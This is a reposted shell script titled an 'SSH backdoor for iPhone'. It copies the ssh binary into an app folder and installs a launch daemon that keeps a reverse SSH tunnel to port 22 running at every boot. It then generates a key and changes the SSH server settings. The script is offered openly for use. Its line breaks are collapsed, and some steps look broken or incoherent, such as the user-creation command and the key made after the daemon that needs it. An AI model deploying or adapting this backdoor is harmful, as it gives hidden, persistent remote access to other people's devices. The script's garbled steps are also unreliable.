原文链接如下：https://github.com/SleepTheGod/iPhone-SSH-Backdoor

#SSH backdoor for iPhone: Made by Taylor C Newsome Twitter.com/ClumsyLulz
#Create a new user on the iPhonedefaults write /var/mobile/Library/Preferences/com.apple.mobile.installation.plist userhome_uid 501
#Create a folder in the user's home directorymkdir -p /var/mobile/Containers/Data/Application/<unique-identifier>
#Copy the SSH binary to that foldercp /usr/bin/ssh /var/mobile/Containers/Data/Application/<unique-identifier>/ssh
#Change permissions for the binarychmod +x /var/mobile/Containers/Data/Application/<unique-identifier>/ssh
#Create a launch daemon to run the binarycat << EOF > /Library/LaunchDaemons/com.example.ssh.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict>        <key>Label</key>        <string>com.example.ssh</string>        <key>ProgramArguments</key>        <array>                <string>/var/mobile/Containers/Data/Application/<unique-identifier>/ssh</string>                <string>-i</string>                <string>/var/mobile/Containers/Data/Application/<unique-identifier>/id_rsa</string>                <string>-p</string>                <string>2222</string>                <string>-R</string>                <string>8080:localhost:22</string>        </array>        <key>KeepAlive</key>        <true/>        <key>RunAtLoad</key>        <true/>        <key>UserName</key>        <string>mobile</string></dict></plist>EOF
#Load the launch daemonlaunchctl load -w /Library/LaunchDaemons/com.example.ssh.plist
#Create the SSH keyssh-keygen -t rsa -b 4096 -f /var/mobile/Containers/Data/Application/<unique-identifier>/id_rsa
#Disable password authenticationecho "PasswordAuthentication no" >> /etc/ssh/sshd_config
#Restart the SSH daemon/usr/sbin/sshd restart